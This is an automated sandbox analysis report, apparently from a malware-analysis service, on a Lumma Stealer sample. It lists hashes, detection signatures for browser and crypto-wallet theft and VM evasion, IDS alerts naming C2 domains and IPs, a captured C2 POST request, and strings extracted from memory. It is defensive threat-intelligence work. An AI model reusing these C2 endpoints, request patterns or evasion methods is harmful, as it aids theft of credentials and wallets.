Edit tour

Windows Analysis Report
k7h8uufe6Y.exe

Overview

General Information

Sample name:	k7h8uufe6Y.exe renamed because original name is a hash value
Original sample name:	942d9e96f053c02c029afd39ec71386285190e972457be9d8e0d310c4c5b4f28.exe
Analysis ID:	1590537
MD5:	afcc99e595001bea3807d99e9811e94a
SHA1:	c4115e70f98e3905bd7ec1b63281302ed40b9c0c
SHA256:	942d9e96f053c02c029afd39ec71386285190e972457be9d8e0d310c4c5b4f28
Tags:	exeTHSUPPORTSERVICESLTDuser-JAMESWT_MHT
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Creates HTML files with .exe extension (expired dropper behavior)

Found many strings related to Crypto-Wallets (likely being stolen)

LummaC encrypted strings found

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Detected potential crypto function

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Searches for user specific document files

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

k7h8uufe6Y.exe (PID: 6372 cmdline: "C:\Users\user\Desktop\k7h8uufe6Y.exe" MD5: AFCC99E595001BEA3807D99E9811E94A)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": "https://www.dropbox.com/static/api", "Build Version": "BbL7Kk--DiFi"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.2118898607.00000000028B0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x511ee:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49 0x54784:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
00000000.00000003.2024541513.0000000000D73000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.2039937644.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.2011209541.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.2037827438.0000000000D73000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.2023523686.0000000000D73000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: k7h8uufe6Y.exe PID: 6372	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: k7h8uufe6Y.exe PID: 6372	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: k7h8uufe6Y.exe PID: 6372	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 5 entries

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-14T08:55:31.529066+0100	2028371	3	Unknown Traffic	192.168.2.4	49733	104.102.49.254	443	TCP
2025-01-14T08:55:32.904742+0100	2028371	3	Unknown Traffic	192.168.2.4	49736	188.114.96.3	443	TCP
2025-01-14T08:55:33.859115+0100	2028371	3	Unknown Traffic	192.168.2.4	49739	188.114.96.3	443	TCP
2025-01-14T08:55:35.259533+0100	2028371	3	Unknown Traffic	192.168.2.4	49741	188.114.96.3	443	TCP
2025-01-14T08:55:36.553310+0100	2028371	3	Unknown Traffic	192.168.2.4	49743	188.114.96.3	443	TCP
2025-01-14T08:55:37.938188+0100	2028371	3	Unknown Traffic	192.168.2.4	49744	188.114.96.3	443	TCP
2025-01-14T08:55:39.335375+0100	2028371	3	Unknown Traffic	192.168.2.4	49745	188.114.96.3	443	TCP
2025-01-14T08:55:40.703145+0100	2028371	3	Unknown Traffic	192.168.2.4	49746	188.114.96.3	443	TCP
2025-01-14T08:55:43.243713+0100	2028371	3	Unknown Traffic	192.168.2.4	49747	188.114.96.3	443	TCP
2025-01-14T08:55:44.343650+0100	2028371	3	Unknown Traffic	192.168.2.4	49748	162.125.66.18	443	TCP
2025-01-14T08:55:45.867570+0100	2028371	3	Unknown Traffic	192.168.2.4	49749	162.125.66.15	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-14T08:55:33.334584+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49736	188.114.96.3	443	TCP
2025-01-14T08:55:34.339184+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49739	188.114.96.3	443	TCP
2025-01-14T08:55:43.688888+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49747	188.114.96.3	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-14T08:55:33.334584+0100	2049836	1	A Network Trojan was detected	192.168.2.4	49736	188.114.96.3	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-14T08:55:34.339184+0100	2049812	1	A Network Trojan was detected	192.168.2.4	49739	188.114.96.3	443	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bloodyswif .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-14T08:55:30.742563+0100	2059189	1	Domain Observed Used for C2 Detected	192.168.2.4	53856	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (finickypwk .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-14T08:55:30.817886+0100	2059191	1	Domain Observed Used for C2 Detected	192.168.2.4	51897	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (kickykiduz .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-14T08:55:30.792946+0100	2059199	1	Domain Observed Used for C2 Detected	192.168.2.4	55019	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (leggelatez .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-14T08:55:30.769692+0100	2059201	1	Domain Observed Used for C2 Detected	192.168.2.4	51038	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (miniatureyu .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-14T08:55:30.781551+0100	2059203	1	Domain Observed Used for C2 Detected	192.168.2.4	61267	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (savorraiykj .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-14T08:55:30.804464+0100	2059207	1	Domain Observed Used for C2 Detected	192.168.2.4	64348	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (shoefeatthe .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-14T08:55:30.725884+0100	2059209	1	Domain Observed Used for C2 Detected	192.168.2.4	57981	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (washyceehsu .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-14T08:55:30.756217+0100	2059211	1	Domain Observed Used for C2 Detected	192.168.2.4	50889	1.1.1.1	53	UDP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-14T08:55:37.016310+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.4	49743	188.114.96.3	443	TCP

ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-14T08:55:32.167195+0100	2858666	1	Domain Observed Used for C2 Detected	192.168.2.4	49733	104.102.49.254	443	TCP

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: aleksandr-block.com

Source: k7h8uufe6Y.exe, 00000000.00000003.2023993461.0000000003BD5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: k7h8uufe6Y.exe, 00000000.00000003.2023993461.0000000003BD5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: k7h8uufe6Y.exe	String found in binary or memory: http://cevcsca2021.crl.certum.pl/cevcsca2021.crl0w
Source: k7h8uufe6Y.exe	String found in binary or memory: http://cevcsca2021.ocsp-certum.com07
Source: k7h8uufe6Y.exe	String found in binary or memory: http://crl.certum.pl/ctnca.crl0k
Source: k7h8uufe6Y.exe	String found in binary or memory: http://crl.certum.pl/ctnca2.crl0l
Source: k7h8uufe6Y.exe	String found in binary or memory: http://crl.certum.pl/ctsca2021.crl0o
Source: k7h8uufe6Y.exe, 00000000.00000003.2011066767.0000000003BB3000.00000004.00000800.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.2012574980.0000000003BB0000.00000004.00000800.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.2011976232.0000000003BB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.miD
Source: k7h8uufe6Y.exe, 00000000.00000003.2023993461.0000000003BD5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: k7h8uufe6Y.exe, 00000000.00000003.2023993461.0000000003BD5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: k7h8uufe6Y.exe, 00000000.00000003.2023993461.0000000003BD5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: k7h8uufe6Y.exe, 00000000.00000003.2023993461.0000000003BD5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: k7h8uufe6Y.exe, 00000000.00000003.2023993461.0000000003BD5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: k7h8uufe6Y.exe, 00000000.00000003.2023993461.0000000003BD5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: k7h8uufe6Y.exe, 00000000.00000003.2023993461.0000000003BD5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: k7h8uufe6Y.exe	String found in binary or memory: http://repository.certum.pl/cevcsca2021.cer0
Source: k7h8uufe6Y.exe	String found in binary or memory: http://repository.certum.pl/ctnca.cer09
Source: k7h8uufe6Y.exe	String found in binary or memory: http://repository.certum.pl/ctnca2.cer09
Source: k7h8uufe6Y.exe	String found in binary or memory: http://repository.certum.pl/ctsca2021.cer0A
Source: k7h8uufe6Y.exe, 00000000.00000003.2024541513.0000000000D73000.00000004.00000020.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.2039858894.0000000000DC7000.00000004.00000020.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.2023523686.0000000000D73000.00000004.00000020.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.2037827438.0000000000D73000.00000004.00000020.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.2011209541.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered
Source: k7h8uufe6Y.exe, 00000000.00000003.1985292539.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: k7h8uufe6Y.exe, 00000000.00000003.1985292539.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: k7h8uufe6Y.exe, 00000000.00000002.2118594731.0000000000D1F000.00000004.00000020.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.1985292539.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: k7h8uufe6Y.exe	String found in binary or memory: http://subca.ocsp-certum.com01
Source: k7h8uufe6Y.exe	String found in binary or memory: http://subca.ocsp-certum.com02
Source: k7h8uufe6Y.exe	String found in binary or memory: http://subca.ocsp-certum.com05
Source: Amcache.hve.0.dr	String found in binary or memory: http://upx.sf.net
Source: k7h8uufe6Y.exe	String found in binary or memory: http://www.certum.pl/CPS0
Source: k7h8uufe6Y.exe, 00000000.00000003.2011066767.0000000003BB3000.00000004.00000800.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.2012574980.0000000003BB0000.00000004.00000800.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.2011976232.0000000003BB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.coV
Source: k7h8uufe6Y.exe, 00000000.00000003.1985292539.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: k7h8uufe6Y.exe, 00000000.00000003.2023993461.0000000003BD5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: k7h8uufe6Y.exe, 00000000.00000003.2023993461.0000000003BD5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: k7h8uufe6Y.exe, 00000000.00000003.2115321107.0000000003B98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/
Source: k7h8uufe6Y.exe, 00000000.00000003.2115321107.0000000003B98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://a.sprig.com/
Source: k7h8uufe6Y.exe, 00000000.00000003.1998052434.0000000003BDD000.00000004.00000800.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.1998138957.0000000003BDB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: k7h8uufe6Y.exe, 00000000.00000003.2115321107.0000000003B98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/
Source: k7h8uufe6Y.exe, 00000000.00000003.2115321107.0000000003B98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/gsi/client
Source: k7h8uufe6Y.exe, 00000000.00000002.2118594731.0000000000D5F000.00000004.00000020.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.2053858893.0000000000DCE000.00000004.00000020.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.2037827438.0000000000D5F000.00000004.00000020.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.2052812917.0000000000DCE000.00000004.00000020.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.2079463517.0000000000D5F000.00000004.00000020.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.2010933282.0000000003B9C000.00000004.00000800.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.2061046652.0000000000DCE000.00000004.00000020.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.2115271663.0000000003BA0000.00000004.00000800.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.2023523686.0000000000D5F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://aleksandr-block.com/
Source: k7h8uufe6Y.exe, 00000000.00000003.1985324803.0000000000D73000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://aleksandr-block.com/8m
Source: k7h8uufe6Y.exe, 00000000.00000003.2060018459.0000000003B9D000.00000004.00000800.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000002.2119446736.0000000003BA2000.00000004.00000800.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.2079443911.0000000003B9D000.00000004.00000800.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.2061582025.0000000003B9D000.00000004.00000800.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.2115271663.0000000003BA0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aleksandr-block.com/F90=
Source: k7h8uufe6Y.exe, 00000000.00000003.2060018459.0000000003B9D000.00000004.00000800.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000002.2119446736.0000000003BA2000.00000004.00000800.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.2079443911.0000000003B9D000.00000004.00000800.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.2061582025.0000000003B9D000.00000004.00000800.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.2115271663.0000000003BA0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aleksandr-block.com/NC
Source: k7h8uufe6Y.exe, 00000000.00000003.2024541513.0000000000D5F000.00000004.00000020.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.2053120999.0000000000D5F000.00000004.00000020.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000002.2118594731.0000000000D5F000.00000004.00000020.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.2037827438.0000000000D5F000.00000004.00000020.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.2079463517.0000000000D5F000.00000004.00000020.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.2023523686.0000000000D5F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://aleksandr-block.com/S
Source: k7h8uufe6Y.exe, 00000000.00000002.2119374553.0000000003B90000.00000004.00000800.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.2079463517.0000000000D71000.00000004.00000020.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.2037827438.0000000000D73000.00000004.00000020.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.2011209541.0000000000DDF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://aleksandr-block.com/api
Source: k7h8uufe6Y.exe, 00000000.00000003.2079463517.0000000000D71000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://aleksandr-block.com/api2Z&l_
Source: k7h8uufe6Y.exe, 00000000.00000003.2037717047.0000000003B98000.00000004.00000800.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.2037783656.0000000003B9B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aleksandr-block.com/apiq=
Source: k7h8uufe6Y.exe, 00000000.00000003.2060018459.0000000003B9D000.00000004.00000800.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.2079443911.0000000003B9D000.00000004.00000800.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.2061582025.0000000003B9D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aleksandr-block.com/bu
Source: k7h8uufe6Y.exe, 00000000.00000002.2119446736.0000000003BA2000.00000004.00000800.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.2115271663.0000000003BA0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aleksandr-block.com/buz=
Source: k7h8uufe6Y.exe, 00000000.00000003.2060018459.0000000003B9D000.00000004.00000800.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000002.2119446736.0000000003BA2000.00000004.00000800.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.2053093375.0000000003B9D000.00000004.00000800.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.2079443911.0000000003B9D000.00000004.00000800.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.2061582025.0000000003B9D000.00000004.00000800.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.2115271663.0000000003BA0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aleksandr-block.com/ec=
Source: k7h8uufe6Y.exe, 00000000.00000003.2037717047.0000000003B98000.00000004.00000800.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.2037783656.0000000003B9B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aleksandr-block.com/fe
Source: k7h8uufe6Y.exe, 00000000.00000003.2037717047.0000000003B98000.00000004.00000800.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.2037783656.0000000003B9B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aleksandr-block.com/ob
Source: k7h8uufe6Y.exe, 00000000.00000003.2060018459.0000000003B9D000.00000004.00000800.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.2011123544.0000000003B9C000.00000004.00000800.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.2037717047.0000000003B98000.00000004.00000800.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.2037783656.0000000003B9B000.00000004.00000800.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000002.2119446736.0000000003BA2000.00000004.00000800.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.2079443911.0000000003B9D000.00000004.00000800.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.2061582025.0000000003B9D000.00000004.00000800.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.2010933282.0000000003B9C000.00000004.00000800.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.2115271663.0000000003BA0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aleksandr-block.com/pi
Source: k7h8uufe6Y.exe, 00000000.00000003.2037717047.0000000003B98000.00000004.00000800.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.2037783656.0000000003B9B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aleksandr-block.com/ta=
Source: k7h8uufe6Y.exe, 00000000.00000003.1985324803.0000000000D4D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://aleksandr-block.com:443/api
Source: k7h8uufe6Y.exe, 00000000.00000003.2115321107.0000000003B98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.login.yahoo.com/
Source: k7h8uufe6Y.exe, 00000000.00000003.2115321107.0000000003B98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://app.hellofax.com/
Source: k7h8uufe6Y.exe, 00000000.00000003.2115321107.0000000003B98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://app.hellosign.com/
Source: k7h8uufe6Y.exe, 00000000.00000002.2118594731.0000000000D5F000.00000004.00000020.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.2115288782.0000000003B9B000.00000004.00000800.00020000.00000000.sdmp, VMB7R5ASJ9ZHN3G5.exe.0.dr	String found in binary or memory: https://assets.dropbox.com/www/en-us/illustrations/spot/target-miss.svg
Source: k7h8uufe6Y.exe, 00000000.00000003.1985292539.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: k7h8uufe6Y.exe, 00000000.00000003.2037717047.0000000003B98000.00000004.00000800.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.2037783656.0000000003B9B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: k7h8uufe6Y.exe, 00000000.00000003.2037717047.0000000003B98000.00000004.00000800.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.2037783656.0000000003B9B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: k7h8uufe6Y.exe, 00000000.00000003.2115321107.0000000003B98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://canny.io/sdk.js
Source: k7h8uufe6Y.exe, 00000000.00000003.1998052434.0000000003BDD000.00000004.00000800.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.1998138957.0000000003BDB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: k7h8uufe6Y.exe, 00000000.00000003.2115321107.0000000003B98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cfl.dropboxstatic.com/static/
Source: k7h8uufe6Y.exe, 00000000.00000002.2118594731.0000000000D5F000.00000004.00000020.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.2115288782.0000000003B9B000.00000004.00000800.00020000.00000000.sdmp, VMB7R5ASJ9ZHN3G5.exe.0.dr	String found in binary or memory: https://cfl.dropboxstatic.com/static/images/favicon.ico
Source: k7h8uufe6Y.exe, 00000000.00000002.2118594731.0000000000D5F000.00000004.00000020.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.2115288782.0000000003B9B000.00000004.00000800.00020000.00000000.sdmp, VMB7R5ASJ9ZHN3G5.exe.0.dr	String found in binary or memory: https://cfl.dropboxstatic.com/static/metaserver/static/css/error.css
Source: k7h8uufe6Y.exe, 00000000.00000003.1998052434.0000000003BDD000.00000004.00000800.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.1998138957.0000000003BDB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: k7h8uufe6Y.exe, 00000000.00000003.1998052434.0000000003BDD000.00000004.00000800.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.1998138957.0000000003BDB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: k7h8uufe6Y.exe, 00000000.00000003.1985292539.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=SCXpgixTDzt4&a
